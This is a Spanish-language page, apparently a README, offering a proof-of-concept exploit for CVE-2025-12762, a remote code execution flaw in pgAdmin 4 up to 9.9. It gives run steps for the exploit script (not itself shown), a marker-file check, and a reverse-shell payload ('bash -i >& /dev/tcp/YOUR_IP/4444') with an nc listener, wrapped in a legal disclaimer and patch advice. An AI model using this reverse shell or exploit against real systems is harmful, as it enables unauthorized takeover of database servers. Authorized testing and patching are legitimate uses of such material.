
Exploit de prueba de concepto para CVE-2025-12762, una RCE crítica en pgAdmin 4 ≤ 9.9. Incluye desglose técnico, CVSS 9.1 y reverse shell opcional para pruebas de penetración autorizadas.

Existe una falla de Ejecución Remota de Código (RCE) en pgAdmin 4 versiones ≤ 9.9. Los atacantes pueden ejecutar comandos arbitrarios en el host cuando pgAdmin se ejecuta en modo servidor y procesa un volcado SQL en formato PLAIN durante la restauración.
🟥 9.1 / 10 — Crítica
⬆️ Actualice a pgAdmin 4 v10.0 o superior
pgAdmin se utiliza a menudo para la administración de bases de datos PostgreSQL críticas, lo que significa:
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests
# 3. Run it
python3 CVE-2025-12762.py
Después de ejecutar, verifique:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
El archivo existe → Acaba de explotar CVE-2025-12762 de verdad.
Reemplace la línea COMMAND con:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Luego nc -lvnp 4444 → shell interactiva completa.
Este es el script exacto que investigadores, pentesters y equipos rojos están usando en todo el mundo en noviembre de 2025.
Úselo con responsabilidad. Parchee todo. Manténgase dentro de la ley.
Este PoC se proporciona estrictamente solo para pruebas autorizadas y uso educativo.
Puede ejecutarlo exclusivamente en sistemas que posea o para los que tenga permiso explícito por escrito para realizar pruebas.
Cualquier uso no autorizado es ilegal y viola las leyes de uso indebido de computadoras.
Úselo con responsabilidad, parchee inmediatamente después de las pruebas y nunca se dirija a sistemas sin permiso.